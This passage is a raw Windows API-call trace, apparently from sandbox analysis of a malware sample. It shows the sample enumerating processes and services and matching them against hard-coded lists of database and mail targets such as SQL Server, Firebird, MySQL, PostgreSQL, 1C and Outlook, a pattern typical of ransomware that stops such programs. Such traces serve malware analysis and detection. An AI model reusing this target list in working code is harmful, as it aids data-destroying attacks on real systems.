th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0048.598] lstrlenW (lpString="vssadmin.exe") returned 12 [0048.598] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0048.598] lstrlenW (lpString="VSSVC.exe") returned 9 [0048.599] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.599] lstrlenW (lpString="svchost.exe") returned 11 [0048.599] Process32NextW (in: hSnapshot=0x220, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0048.600] CloseHandle (hObject=0x220) returned 1 [0048.600] Sleep (dwMilliseconds=0x1f4) [0049.188] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5eff80 [0049.188] EnumServicesStatusExW (in: hSCManager=0x5eff80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0049.188] GetLastError () returned 0xea [0049.188] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x39606f0 [0049.188] EnumServicesStatusExW (in: hSCManager=0x5eff80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x39606f0, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x39606f0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0049.189] CloseServiceHandle (hSCObject=0x5eff80) returned 1 [0049.189] lstrlenW (lpString="Appinfo") returned 7 [0049.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0049.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0049.189] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0049.189] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0049.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0049.189] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0049.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.189] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0049.189] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0049.189] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0049.189] lstrlenW (lpString="AudioSrv") returned 8 [0049.189] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0049.189] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0049.189] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0049.190] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0049.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0049.190] lstrlenW (lpString="BFE") returned 3 [0049.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0049.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0049.190] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0049.190] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0049.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0049.190] lstrlenW (lpString="CryptSvc") returned 8 [0049.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0049.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0049.190] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0049.190] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0049.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0049.190] lstrlenW (lpString="CscService") returned 10 [0049.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0049.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0049.190] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0049.190] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0049.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0049.190] lstrlenW (lpString="DcomLaunch") returned 10 [0049.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.190] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0049.190] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0049.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0049.190] lstrlenW (lpString="Dhcp") returned 4 [0049.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0049.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0049.190] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0049.190] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0049.190] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0049.190] lstrlenW (lpString="Dnscache") returned 8 [0049.190] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0049.190] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0049.191] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0049.191] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0049.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0049.191] lstrlenW (lpString="DPS") returned 3 [0049.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0049.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0049.191] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0049.191] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0049.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0049.191] lstrlenW (lpString="eventlog") returned 8 [0049.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0049.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0049.191] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0049.191] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0049.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0049.191] lstrlenW (lpString="EventSystem") returned 11 [0049.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0049.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0049.191] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0049.191] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0049.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0049.191] lstrlenW (lpString="gpsvc") returned 5 [0049.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0049.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0049.191] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0049.191] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0049.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0049.191] lstrlenW (lpString="iphlpsvc") returned 8 [0049.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.191] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0049.191] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0049.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0049.191] lstrlenW (lpString="LanmanServer") returned 12 [0049.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0049.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0049.192] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0049.192] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0049.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0049.192] lstrlenW (lpString="LanmanWorkstation") returned 17 [0049.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.192] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0049.192] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0049.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0049.192] lstrlenW (lpString="lmhosts") returned 7 [0049.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0049.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0049.192] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0049.192] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0049.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0049.192] lstrlenW (lpString="MMCSS") returned 5 [0049.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0049.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0049.192] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0049.192] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0049.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0049.192] lstrlenW (lpString="MpsSvc") returned 6 [0049.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0049.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0049.192] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0049.192] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0049.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0049.192] lstrlenW (lpString="Netman") returned 6 [0049.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0049.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0049.192] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0049.192] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0049.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0049.193] lstrlenW (lpString="netprofm") returned 8 [0049.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0049.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0049.193] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0049.193] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0049.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0049.193] lstrlenW (lpString="NlaSvc") returned 6 [0049.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0049.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0049.193] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0049.193] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0049.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0049.193] lstrlenW (lpString="nsi") returned 3 [0049.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0049.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0049.193] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0049.193] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0049.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0049.193] lstrlenW (lpString="PcaSvc") returned 6 [0049.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0049.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0049.193] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0049.193] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0049.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0049.193] lstrlenW (lpString="PlugPlay") returned 8 [0049.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0049.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0049.193] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0049.193] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0049.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0049.193] lstrlenW (lpString="Power") returned 5 [0049.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0049.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0049.193] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0049.194] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0049.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0049.194] lstrlenW (lpString="ProfSvc") returned 7 [0049.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0049.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0049.194] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0049.194] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0049.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0049.194] lstrlenW (lpString="RpcEptMapper") returned 12 [0049.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.194] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0049.194] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0049.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0049.194] lstrlenW (lpString="RpcSs") returned 5 [0049.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0049.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0049.194] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0049.194] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0049.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0049.194] lstrlenW (lpString="SamSs") returned 5 [0049.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0049.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0049.194] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0049.194] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0049.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0049.194] lstrlenW (lpString="Schedule") returned 8 [0049.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0049.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0049.194] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0049.195] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0049.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0049.195] lstrlenW (lpString="SENS") returned 4 [0049.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0049.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0049.195] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0049.195] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0049.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0049.195] lstrlenW (lpString="ShellHWDetection") returned 16 [0049.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.195] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0049.195] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0049.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0049.195] lstrlenW (lpString="Spooler") returned 7 [0049.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0049.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0049.195] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0049.195] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0049.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0049.195] lstrlenW (lpString="swprv") returned 5 [0049.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0049.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0049.195] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0049.195] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0049.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0049.195] lstrlenW (lpString="SysMain") returned 7 [0049.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0049.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0049.195] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0049.195] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0049.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0049.195] lstrlenW (lpString="Themes") returned 6 [0049.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0049.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0049.196] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0049.196] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0049.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0049.196] lstrlenW (lpString="TrkWks") returned 6 [0049.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0049.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0049.196] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0049.196] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0049.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0049.196] lstrlenW (lpString="UxSms") returned 5 [0049.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0049.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0049.196] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0049.196] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0049.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0049.196] lstrlenW (lpString="VSS") returned 3 [0049.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0049.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0049.196] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0049.196] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0049.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0049.196] lstrlenW (lpString="WdiServiceHost") returned 14 [0049.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.196] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0049.196] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0049.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0049.196] lstrlenW (lpString="WdiSystemHost") returned 13 [0049.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.196] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0049.196] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0049.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0049.197] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0049.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.197] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0049.197] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0049.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0049.197] lstrlenW (lpString="Winmgmt") returned 7 [0049.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0049.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0049.197] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0049.197] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0049.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0049.197] lstrlenW (lpString="WPDBusEnum") returned 10 [0049.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.197] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0049.197] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0049.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0049.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39606f0 | out: hHeap=0x570000) returned 1 [0049.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224 [0049.199] Process32FirstW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0049.200] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0049.201] lstrlenW (lpString="System") returned 6 [0049.201] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0049.201] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0049.201] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0049.201] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0049.201] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0049.201] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0049.201] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0049.201] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0049.202] lstrlenW (lpString="smss.exe") returned 8 [0049.202] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0049.202] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0049.202] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0049.202] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0049.202] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0049.202] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0049.202] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0049.202] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.202] lstrlenW (lpString="csrss.exe") returned 9 [0049.203] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0049.203] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0049.203] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0049.203] lstrcmpiW 